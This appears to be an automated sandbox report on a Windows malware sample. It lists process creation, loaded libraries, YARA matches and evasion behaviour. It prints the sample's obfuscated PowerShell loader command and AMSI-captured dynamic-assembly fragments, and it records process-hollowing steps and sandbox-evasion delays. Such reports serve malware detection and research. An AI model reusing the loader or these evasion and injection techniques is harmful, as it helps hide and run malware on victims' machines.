      Source: unknownProcess created: C:\Users\user\Desktop\Cpfkf79Rzk.exe "C:\Users\user\Desktop\Cpfkf79Rzk.exe"
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe "C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe"
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Cpfkf79Rzk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: on.pdb source: powershell.exe, 00000002.00000002.2059540466.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2064199965.0000000007121000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: Yara matchFile source: 00000007.00000002.2638156664.00000000016FA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.2070497812.0000000008D1A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unattainable $Opgaveteksterallotationernes $Sunrises), (Udlbernes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tongues = [AppDomain]::CurrentDomain.GetA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Trimpregneringer)), $Catalytic56).DefineDynamicModule($Skrivelrernes, $false).DefineType($Stafylokokkers, $Triploidy, [System.Multicas
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02C8A5CF push eax; iretd 2_2_02C8A659
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02C8E9F9 push eax; mov dword ptr [esp], edx2_2_02C8EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_071A0FC4 push es; iretd 2_2_071A0FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C86CF4 push es; iretd 2_2_08C86CF5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C824F6 push edi; iretd 2_2_08C824A9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C86A3B push ss; ret 2_2_08C86A42
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C843CD push ds; ret 2_2_08C843D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C86DA3 push cx; ret 2_2_08C86DB6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08C8391A push es; iretd 2_2_08C8391C
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_0166391A push es; iretd 7_2_0166391C
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_016643CD push ds; ret 7_2_016643D8
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_01666DA3 push cx; ret 7_2_01666DB6
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_01666A3B push ss; ret 7_2_01666A42
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_016624F6 push edi; iretd 7_2_016624A9
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeCode function: 7_2_01666CF4 push es; iretd 7_2_01666CF5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe API/Special instruction interceptor: Address: 1CD8EED
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7718
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1887
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3024 Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe TID: 3312 Thread sleep time: -200000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe Code function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2060046848.00000000052FC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2060046848.00000000052FC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2060046848.00000000052FC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: Kvababbelser58.exe, 00000007.00000003.2343169499.000000000549D000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005448000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2332425040.000000000549D000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.000000000549D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe API call chain: ExitProcess graph end node graph_0-3771
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe API call chain: ExitProcess graph end node graph_0-3763
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe Process queried: DebugPort
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_02C877F9 LdrInitializeThunk,2_2_02C877F9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe base address: 400000
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe base: 1660000
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe "C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
